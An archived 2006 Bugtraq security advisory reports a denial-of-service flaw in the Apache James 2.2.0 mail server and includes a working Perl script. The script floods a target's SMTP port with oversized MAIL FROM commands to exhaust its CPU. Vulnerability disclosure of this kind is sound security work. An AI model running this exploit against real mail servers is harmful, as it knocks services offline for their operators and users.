lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060528101527.30799.qmail@securityfocus.com>
Date: 28 May 2006 10:15:27 -0000
From: y3dips@...o.or.id
To: bugtraq@...urityfocus.com
Subject: JAMES 2.2.0 <-- Denial Of Service


---------------------------------------------------------------------------
[ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service
---------------------------------------------------------------------------

Author       : y3dips a.k.a Ahmad Muammar W.K
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)
version     : 2.2.0
URL         : http://jakarta.apache.org/avalon/phoenix
Description :

The Java Apache Mail Enterprise Server (a.k.a. Apache James) is 
a 100% pure Java SMTP and POP3 Mail server and NNTP News server. 
James also designed to be a complete and portable enterprise mail 
engine solution based on currently available open protocols. 

James is based upon the Apache Avalon application framework. 
(For more information about Avalon, please go to http://avalon.apache.org/)

James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3).

----------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

James SMTP servers are allowing attacker to supply a long variable at 
SMTP argument (such as MAIL) to the SMTP server, because of this 
vulnerability the Processor at server machine will have a workload till 100%


Exploit Code:
~~~~~~~~~~~~~

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;
                                                 
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{
      
      my $host = $ARGV[0];
      my $i = 1;
      
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1) 
or die " Cannot Connect to Server !";

while ( $i++ ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and 
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
  close $socket;

}  
else
 {  print " Usage: $0 [target] \r\n\n";  }  

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@...oogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/
     Blogs   : http://y3d1ps.blogspot.com/

-------------------------------- [ EOF ] ----------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ